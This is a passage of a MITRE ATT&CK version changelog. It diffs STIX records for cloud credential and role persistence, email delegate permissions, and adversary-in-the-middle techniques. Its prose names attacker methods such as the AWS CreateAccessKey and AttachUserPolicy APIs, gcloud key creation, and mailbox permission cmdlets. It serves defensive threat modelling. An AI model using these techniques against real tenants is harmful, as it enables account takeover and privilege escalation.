Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation) |
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'User'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-08 10:33:01.582000+00:00 | 2022-10-24 15:20:47.020000+00:00 |
| description | Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.<br>Adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)<br>In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes) | Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.<br>For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)<br>In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)<br>Adversaries may also use the CreateAccessKey API in AWS or the gcloud iam service-accounts keys create command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation) |
| external_references[1]['source_name'] | Microsoft SolarWinds Customer Guidance | Expel IO Evil in AWS |
| external_references[1]['description'] | MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 17, 2020. | A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020. |
| external_references[1]['url'] | https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ | https://expel.io/blog/finding-evil-in-aws/ |
| external_references[2]['source_name'] | Blue Cloud of Death | Demystifying Azure AD Service Principals |
| external_references[2]['description'] | Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming Azure. Retrieved October 23, 2019. | Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service Principals. Retrieved January 19, 2020. |
| external_references[2]['url'] | https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1 | https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/ |
| external_references[3]['source_name'] | Blue Cloud of Death Video | GCP SSH Key Add |
| external_references[3]['description'] | Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming Azure. Retrieved November 21, 2019. | Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved October 1, 2020. |
| external_references[3]['url'] | https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815 | https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add |
| external_references[4]['source_name'] | Demystifying Azure AD Service Principals | Blue Cloud of Death Video |
| external_references[4]['description'] | Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service Principals. Retrieved January 19, 2020. | Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming Azure. Retrieved November 21, 2019. |
| external_references[4]['url'] | https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/ | https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815 |
| external_references[5]['source_name'] | GCP SSH Key Add | Blue Cloud of Death |
| external_references[5]['description'] | Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved October 1, 2020. | Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming Azure. Retrieved October 23, 2019. |
| external_references[5]['url'] | https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add | https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1 |
| external_references[6]['source_name'] | Expel IO Evil in AWS | Microsoft SolarWinds Customer Guidance |
| external_references[6]['description'] | A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020. | MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 17, 2020. |
| external_references[6]['url'] | https://expel.io/blog/finding-evil-in-aws/ | https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ |
| x_mitre_data_sources[0] | User Account: User Account Modification | Active Directory: Active Directory Object Modification |
| x_mitre_data_sources[1] | Active Directory: Active Directory Object Modification | User Account: User Account Modification |
| x_mitre_version | 2.2 | 2.4 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Rhino Security Labs AWS Privilege Escalation', 'description': 'Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation – Methods and Mitigation. Retrieved May 27, 2022.', 'url': 'https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/'} | |
| x_mitre_contributors | Zur Ulianitzky, XM Cyber | |
| x_mitre_contributors | Alex Soler, AttackIQ | |
| x_mitre_platforms | SaaS | |
| Old Description | New Description |
|---|---|
| An adversary may add the Global Administrator role to an adversary-controlled account to maintain persistent access to an Office 365 tenant.(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins) via the global admin role.(Citation: Microsoft O365 Admin Roles) This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. | An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker)<br>(Citation: Microsoft O365 Admin Roles)<br>This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.<br>For example, in Azure AD environments, an adversary with the Application Administrator role can add [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to their application's service principal. In doing so the adversary would be able to gain the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation) Similarly, in AWS environments, an adversary with appropriate permissions may be able to use the CreatePolicyVersion API to define a new version of an IAM policy or the AttachUserPolicy API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation)<br>Similarly, an adversary with the Azure AD Global Administrator role can toggle the “Access management for Azure resources” option to gain the ability to assign privileged access to Azure subscriptions and virtual machines to Azure AD users, including themselves.(Citation: Azure AD to AD) |
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-24 12:40:02.331000+00:00 | 2022-10-24 15:21:19.955000+00:00 |
| name | Add Office 365 Global Administrator Role | Additional Cloud Roles |
| description | An adversary may add the Global Administrator role to an adversary-controlled account to maintain persistent access to an Office 365 tenant.(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins) via the global admin role.(Citation: Microsoft O365 Admin Roles) This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. | An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker)<br>(Citation: Microsoft O365 Admin Roles)<br>This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.<br>For example, in Azure AD environments, an adversary with the Application Administrator role can add [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to their application's service principal. In doing so the adversary would be able to gain the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation) Similarly, in AWS environments, an adversary with appropriate permissions may be able to use the CreatePolicyVersion API to define a new version of an IAM policy or the AttachUserPolicy API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation)<br>Similarly, an adversary with the Azure AD Global Administrator role can toggle the “Access management for Azure resources” option to gain the ability to assign privileged access to Azure subscriptions and virtual machines to Azure AD users, including themselves.(Citation: Azure AD to AD) |
| external_references[1]['source_name'] | Microsoft Support O365 Add Another Admin, October 2019 | Expel AWS Attacker |
| external_references[1]['description'] | Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019. | Brian Bahtiarian, David Blanton, Britton Manahan and Kyle Pellett. (2022, April 5). Incident report: From CLI to console, chasing an attacker in AWS. Retrieved April 7, 2022. |
| external_references[1]['url'] | https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d | https://expel.com/blog/incident-report-from-cli-to-console-chasing-an-attacker-in-aws/ |
| x_mitre_detection | Collect usage logs from cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. | Collect activity logs from IAM services and cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. |
| x_mitre_version | 1.0 | 2.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'SpecterOps Azure Privilege Escalation', 'description': 'Andy Robbins. (2021, October 12). Azure Privilege Escalation via Service Principal Abuse. Retrieved April 1, 2022.', 'url': 'https://posts.specterops.io/azure-privilege-escalation-via-service-principal-abuse-210ae2be2a5'} | |
| external_references | {'source_name': 'AWS IAM Policies and Permissions', 'description': 'AWS. (n.d.). Policies and permissions in IAM. Retrieved April 1, 2022.', 'url': 'https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies.html'} | |
| external_references | {'source_name': 'Google Cloud IAM Policies', 'description': 'Google Cloud. (2022, March 31). Understanding policies. Retrieved April 1, 2022.', 'url': 'https://cloud.google.com/iam/docs/policies'} | |
| external_references | {'source_name': 'Microsoft Support O365 Add Another Admin, October 2019', 'description': 'Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019.', 'url': 'https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d'} | |
| external_references | {'source_name': 'Azure AD to AD', 'description': 'Sean Metcalf. (2020, May 27). From Azure AD to Active Directory (via Azure) – An Unanticipated Attack Path. Retrieved September 28, 2022.', 'url': 'https://adsecurity.org/?p=4277'} | |
| external_references | {'source_name': 'Rhino Security Labs AWS Privilege Escalation', 'description': 'Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation – Methods and Mitigation. Retrieved May 27, 2022.', 'url': 'https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/'} | |
| x_mitre_contributors | Alex Parsons, Crowdstrike | |
| x_mitre_contributors | Chris Romano, Crowdstrike | |
| x_mitre_contributors | Wojciech Lesicki | |
| x_mitre_contributors | Pià Consigny, Tenable | |
| x_mitre_contributors | Clément Notin, Tenable | |
| x_mitre_contributors | Praetorian | |
| x_mitre_contributors | Alex Soler, AttackIQ | |
| x_mitre_platforms | IaaS | |
| x_mitre_platforms | SaaS | |
| x_mitre_platforms | Google Workspace | |
| x_mitre_platforms | Azure AD | |
| Old Description | New Description |
|---|---|
| Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. Adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452) This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019) | Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account.<br>For example, the Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.(Citation: Gmail Delegation)(Citation: Google Ensuring Your Information is Safe)<br>Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452)<br>This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019) |

New Mitigations:

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator'] | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 18:57:04.148000+00:00 | 2022-04-19 14:55:26.110000+00:00 |
| name | Exchange Email Delegate Permissions | Additional Email Delegate Permissions |
| description | Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018)
Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. Adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452)
This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019) |
Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account.
For example, the Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.(Citation: Gmail Delegation)(Citation: Google Ensuring Your Information is Safe)
Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452)
This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019) |
| external_references[1]['source_name'] | Microsoft - Add-MailboxPermission | Bienstock, D. - Defending O365 - 2019 |
| external_references[1]['description'] | Microsoft. (n.d.). Add-Mailbox Permission. Retrieved September 13, 2019. | Bienstock, D.. (2019). BECS and Beyond: Investigating and Defending O365. Retrieved September 13, 2019. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/powershell/module/exchange/mailboxes/add-mailboxpermission?view=exchange-ps | https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365 |
| external_references[2]['source_name'] | FireEye APT35 2018 | Crowdstrike Hiding in Plain Sight 2018 |
| external_references[2]['description'] | Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018. | Crowdstrike. (2018, July 18). Hiding in Plain Sight: Using the Office 365 Activities API to Investigate Business Email Compromises. Retrieved January 19, 2020. |
| external_references[2]['url'] | https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf | https://www.crowdstrike.com/blog/hiding-in-plain-sight-using-the-office-365-activities-api-to-investigate-business-email-compromises/ |
| external_references[3]['source_name'] | Crowdstrike Hiding in Plain Sight 2018 | Google Ensuring Your Information is Safe |
| external_references[3]['description'] | Crowdstrike. (2018, July 18). Hiding in Plain Sight: Using the Office 365 Activities API to Investigate Business Email Compromises. Retrieved January 19, 2020. | Google. (2011, June 1). Ensuring your information is safe online. Retrieved April 1, 2022. |
| external_references[3]['url'] | https://www.crowdstrike.com/blog/hiding-in-plain-sight-using-the-office-365-activities-api-to-investigate-business-email-compromises/ | https://googleblog.blogspot.com/2011/06/ensuring-your-information-is-safe.html |
| external_references[4]['source_name'] | Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452 | Gmail Delegation |
| external_references[4]['description'] | Mike Burns, Matthew McWhirt, Douglas Bienstock, Nick Bennett. (2021, January 19). Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452. Retrieved September 25, 2021. | Google. (n.d.). Turn Gmail delegation on or off. Retrieved April 1, 2022. |
| external_references[4]['url'] | https://www.fireeye.com/blog/threat-research/2021/01/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452.html | https://support.google.com/a/answer/7223765?hl=en |
| external_references[5]['source_name'] | Bienstock, D. - Defending O365 - 2019 | FireEye APT35 2018 |
| external_references[5]['description'] | Bienstock, D.. (2019). BECS and Beyond: Investigating and Defending O365. Retrieved September 13, 2019. | Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018. |
| external_references[5]['url'] | https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365 | https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf |
| x_mitre_version | 1.1 | 2.0 |

| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Microsoft - Add-MailboxPermission', 'description': 'Microsoft. (n.d.). Add-Mailbox Permission. Retrieved September 13, 2019.', 'url': 'https://docs.microsoft.com/en-us/powershell/module/exchange/mailboxes/add-mailboxpermission?view=exchange-ps'} | |
| external_references | {'source_name': 'Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452', 'description': 'Mike Burns, Matthew McWhirt, Douglas Bienstock, Nick Bennett. (2021, January 19). Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452. Retrieved September 25, 2021.', 'url': 'https://www.fireeye.com/blog/threat-research/2021/01/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452.html'} | |
| x_mitre_data_sources | User Account: User Account Modification | |
| x_mitre_platforms | Google Workspace | |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | User Account: User Account Modification | |

| Old Description | New Description |
|---|---|
| Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics) Adversaries may leverage the AiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service. | Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics) For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials and session cookies.(Citation: volexity_0day_sophos_FW) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att) Adversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562) and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498). |

New Detections:

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Abendan, O. (2012, June 14). How DNS Changer Trojans Direct Users to Threats. Retrieved October 28, 2021. | |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| external_references | CAPEC-94 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-09-28 13:09:51.467000+00:00 | 2022-10-19 19:51:41.858000+00:00 |
| description | Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics) Adversaries may leverage the AiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service. | Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics) For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials and session cookies.(Citation: volexity_0day_sophos_FW) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att) Adversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562) and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498). |
| external_references[1]['source_name'] | capec | dns_changer_trojans |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/94.html | https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/125/how-dns-changer-trojans-direct-users-to-threats |
| external_references[2]['source_name'] | Rapid7 MiTM Basics | volexity_0day_sophos_FW |
| external_references[2]['description'] | Rapid7. (n.d.). Man-in-the-Middle (MITM) Attacks. Retrieved March 2, 2020. | Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022. |
| external_references[2]['url'] | https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/ | https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/ |
| x_mitre_version | 2.0 | 2.2 |

| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'taxonomy_downgrade_att_tls', 'description': "Alashwali, E. S., Rasmussen, K. (2019, January 26). What's in a Downgrade? A Taxonomy of Downgrade Attacks in the TLS Protocol and Application Protocols Using TLS. Retrieved December 7, 2021.", 'url': 'https://arxiv.org/abs/1809.05681'} | |
| external_references | {'source_name': 'ad_blocker_with_miner', 'description': 'Kuzmenko, A.. (2021, March 10). Ad blocker with miner included. Retrieved October 28, 2021.', 'url': 'https://securelist.com/ad-blocker-with-miner-included/101105/'} | |
| external_references | {'source_name': 'mitm_tls_downgrade_att', 'description': 'praetorian Editorial Team. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved December 8, 2021.', 'url': 'https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/'} | |
| external_references | {'source_name': 'Rapid7 MiTM Basics', 'description': 'Rapid7. (n.d.). Man-in-the-Middle (MITM) Attacks. Retrieved March 2, 2020.', 'url': 'https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/'} | |
